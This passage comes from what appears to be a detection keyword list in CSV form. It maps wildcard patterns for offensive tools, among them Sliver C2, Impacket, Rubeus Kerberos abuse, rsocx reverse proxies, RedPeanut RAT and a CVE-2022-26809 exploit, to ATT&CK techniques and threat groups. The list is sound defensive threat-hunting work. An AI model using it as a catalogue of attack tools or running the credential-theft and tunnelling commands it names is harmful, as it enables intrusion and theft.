- T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpc-beacons.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - 
TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpcdump.py * | grep MS-RPRN*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*rpcdump.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpcdump_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*rpc-hijack.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - 
TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpc-kill.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpcmap.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpc-msf.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpcrelayclient.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpcrelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*rpcrt4_new.dll*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation 
tools,https://github.com/websecnl/CVE-2022-26809,1,1,N/A,N/A,1,29,6,2022-04-19T17:04:04Z,2022-04-14T08:12:24Z -*rpcrt4_old.dll,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/websecnl/CVE-2022-26809,1,1,N/A,N/A,1,29,6,2022-04-19T17:04:04Z,2022-04-14T08:12:24Z -*rpc-shellcode.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*rpivot.zip*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*rpivot-master*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*rpm.torproject.org/*public_gpg.key*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rsactftool --*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rsactftool* --dumpkey --key *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rshijack*,offensive_tool_keyword,rshijack,tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. 
then inject a tcp packet into the telnet connection:,T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004,TA0011 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/kpcyrd/rshijack,1,0,N/A,N/A,5,402,41,2023-06-03T16:37:11Z,2018-02-23T02:21:45Z -*rsmudge/ElevateKit*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*rsocx -l 0.0.0.0*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx -r *:*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - 
TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx -t 0.0.0.0*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx.exe* 0.0.0.0*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx.exe* 127.0.0.1*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsocx-main.zip*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*rsync -r * *@*:*,greyware_tool_keyword,rsync,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*rsync -r *@*:* *,greyware_tool_keyword,rsync,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*RtlDallas/KrakenMask*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,1,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*rubber_ducky.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Rubeus*currentluid*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus*harvest*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus*logonsession*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*Rubeus*monitor*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-*Rubeus.bin*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*Rubeus.Commands*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-*Rubeus.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z
-*Rubeus.exe*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-*Rubeus.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z
-*Rubeus.git*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-*Rubeus.Kerberos*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-*Rubeus.lib*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z
-*rubeus.txt*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusAskTgtMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusASREPRoastManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusChangePwManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusCreateNetOnlyManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusDescribeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusDumpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusDumpMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusHarvestManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusHarvestMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusHashManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusKerberoastManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusKerberoastMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusKlistManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusMonitorManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
